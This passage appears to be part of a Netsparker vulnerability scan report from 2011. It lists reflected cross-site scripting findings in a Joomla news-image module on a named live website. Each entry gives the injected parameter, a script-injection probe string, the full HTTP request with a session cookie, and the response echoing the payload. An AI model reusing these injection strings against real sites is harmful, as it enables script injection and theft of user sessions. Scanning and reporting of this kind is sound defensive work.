Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: '"--></style></script><script>netsparker(0x001C4F)</script>px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: '"--></style></script><script>netsparker(0x001C4F)</script>px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: -64px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: -66px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: '"--></style></script><script>netsparker(0x001C4F)</script>px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET '"--></style></script><script>alert(0x001C72)</script>
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001C72)%3C/script%3E&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":'"--></style></script><script>netsparker(0x001C72)</script>,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET '"--></style></script><script>alert(0x001C93)</script>
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001C93)%3C/script%3E&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":'"--></style></script><script>netsparker(0x001C93)</script>,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET '"--></style></script><script>alert(0x001CAA)</script>
thumbnail_height GET 44
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001CAA)%3C/script%3E&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 206px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 56px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 56px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 56px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 56px;
position: absolute;
left: 405px;
top: 204px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: '"--></style></script><script>netsparker(0x001CAA)</script>px;
height: 44px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 52px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET '"--></style></script><script>alert(0x001CB1)</script>
text_block_opacity GET 0
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001CB1)%3C/script%3E&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#'"--></style></script><script>netsparker(0x001CB1)</script>",
"opacity":0,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET '"--></style></script><script>alert(0x001CD5)</script>
thumbnail_width GET 66
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001CD5)%3C/script%3E&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":'"--></style></script><script>netsparker(0x001CD5)</script>,
"thumbnail_width":66,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET '"--></style></script><script>alert(0x001CD4)</script>
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001CD4)%3C/script%3E&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 250px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 12px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 12px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 12px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 12px;
position: absolute;
left: 405px;
top: 248px;
}

.gk_news_image_1_thumb{
margin: 5px;
border: 1px solid ;
width: 66px;
height: '"--></style></script><script>netsparker(0x001CD4)</script>px;
float: left;
display:block;
}

.gk_news_image_1_tbo{
width: 316px;
}

.gk_news_image_1_interface_buttons{
position:absolute;
}

ul.gk_news_image_1_tick_buttons{
position: absolute;
list-style-type: none;
top: -22px;
left: 405px;
margin: 0px;
padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
float: left;
padding: 0px !important;
margin-right: 3px;
}

div.gk_news_image_1_preloader{
position: absolute;
width: 615px;
height: 270px;
background: url('../images/load.gif') no-repeat center center #000;
}
- /modules/mod_gk_news_image_1/js/importer.php

/modules/mod_gk_news_image_1/js/importer.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_..

Parameters

Parameter Type Value
mid GET newsimage1
animation_slide_speed GET 500
animation_interval GET 9000
autoanimation GET 1
animation_slide_type GET 0
animation_text_type GET 0
base_bgcolor GET ffffff
text_block_opacity GET 0
thumbnail_width GET '"--></style></script><script>alert(0x001CFC)</script>
thumbnail_margin GET 5
thumbnail_border GET 1
thumbnail_border_color GET a81c21
thumbnail_border_color_inactive GET ffffff
interface_x GET -20
interface_y GET 0
clickable_slides GET 1

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001CFC)%3C/script%3E&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/javascript



try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
"anim_speed":500,
"anim_interval":9000,
"autoanim":1,
"anim_type":0,
"anim_type_t":0,
"bgcolor":"#ffffff",
"opacity":0,
"thumbnail_width":'"--></style></script><script>netsparker(0x001CFC)</script>,
"thumbnail_margin":5,
"thumbnail_border":1,
"thumbnail_border_color":"#a81c21",
"thumbnail_border_color_inactive":"#ffffff",
"interface_x":-20,
"interface_y":0,
"clickable_slides":1,
"actual_animation":false,
"actual_animation_p":false,
"actual_slide":0
};
- /modules/mod_gk_news_image_1/css/style.php

/modules/mod_gk_news_image_1/css/style.php

http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&tex..

Parameters

Parameter Type Value
text_block_background GET 1
text_block_bgcolor GET ffffff
text_block_width GET 195
text_block_opacity GET 0
text_block_margin GET 405
module_width GET 615
module_height GET 270
thumbnail_bar GET 1
thumbnail_width GET 66
thumbnail_height GET 44
thumbnail_margin GET '"--></style></script><script>alert(0x001D06)</script>
thumbnail_border GET 1
thumbnail_bar_position GET 1
image_x GET 0
image_y GET 0
slides_count GET 4
tick_x GET 405
tick_y GET -22

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001D06)%3C/script%3E&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=7dgk4v45hlcenh15d4tre6ums2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:25:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
Content-Type: text/css



div.gk_news_image_1_wrapper {
overflow: hidden;
border: none;
position: relative;
width: 615px;
height: 270px;
background-color: #;
color: #fff;
}

.gk_news_image_1_slide{
top: 0px;
left: 0px;
position: absolute;
display: block;
}

div.gk_news_image_1_wrapper h2 {
margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
font:normal 28px Geneva, Arial, Helvetica, sans-serif;
text-decoration: none;
}

div.gk_news_image_1_text_datas {
display: none;
}

.gk_news_image_1_text_bg {
padding-right: 10px;
padding-left: 10px;
width: 195px;
height: 270px;
position: absolute;
left: 405px;
background-color: #ffffff;
opacity: 0;
}

div.gk_news_image_1_text {
padding: 10px;
overflow: hidden;
width: 185px;
height: 216px;
position: absolute;
left: 405px;
top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_1_next, a.gk_news_image_1_play, a.gk_news_image_1_pause {
background: transparent url('../images/buttons.png') no-repeat;
display: block;
float: left;
width: 21px;
height: 21px;
margin-left: 2px;
}

a.gk_news_image_1_prev {
background-position: -21px 0;
}

a.gk_news_image_1_play {
background-position: -42px 0;
}

a.gk_news_image_1_pause {
background-position: -63px 0;
}

a:hover.gk_news_image_1_next {
background-position: 0 100%;
}

a:hover.gk_news_image_1_prev {
background-position: -21px 100%;
}

a:hover.gk_news_image_1_play {
background-position: -42px 100%;
}

a:hover.gk_news_image_1_pause {
background-position: -63px 100%;
}

div.gk_news_image_1_tb_prev, div.gk_news_image_1_tb_next {
background: #FFF;
}

div.gk_news_image_1_tb_prev {
background: transparent url('../images/s_prev.png') no-repeat 0 50%;
float: left;
width: 20px;
height: 46px;
}

div.gk_news_image_1_tb_next {
background: transparent url('../images/s_next.png') no-repeat 100% 50%;
float:left;
width:20px;
height: 46px;
}

div.gk_news_image_1_tb_prev:hover {
background: transparent url('../images/s_prev-h.png') no-repeat 0 50%;
}

div.gk_news_image_1_tb_next:hover {
background: transparent url('../images/s_next-h.png') no-repeat 100% 50%;
}

div.gk_news_image_1_tb {
overflow: hidden;
float: left;
height: 46px;
width: 155px;
}

div.gk_news_image_1_thumbnails {
bottom: 100px;
margin-left: 10px;
width: 195px;
height: 46px;
position: absolute;
